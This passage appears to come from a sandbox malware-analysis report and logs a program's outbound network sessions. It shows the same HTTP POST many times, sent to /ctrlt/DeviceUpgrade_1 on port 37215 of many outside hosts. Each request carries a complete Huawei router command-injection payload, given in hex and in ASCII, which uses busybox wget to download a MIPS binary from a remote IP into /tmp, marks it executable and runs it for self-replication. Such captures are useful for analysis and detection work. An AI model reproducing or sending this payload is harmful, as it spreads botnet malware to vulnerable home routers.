                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          146192.168.2.154277641.39.227.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542643070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          147192.168.2.1554422157.15.248.5037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542686939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          148192.168.2.153702041.207.24.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542686939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          149192.168.2.1535840197.121.243.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542714119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          150192.168.2.1545030197.54.19.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542743921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          151192.168.2.154947241.219.28.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543123960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          152192.168.2.1551310197.91.103.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543165922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          153192.168.2.154981841.236.71.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543181896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          154192.168.2.154861041.253.29.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543260098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          155192.168.2.1554640197.148.164.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543267965 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
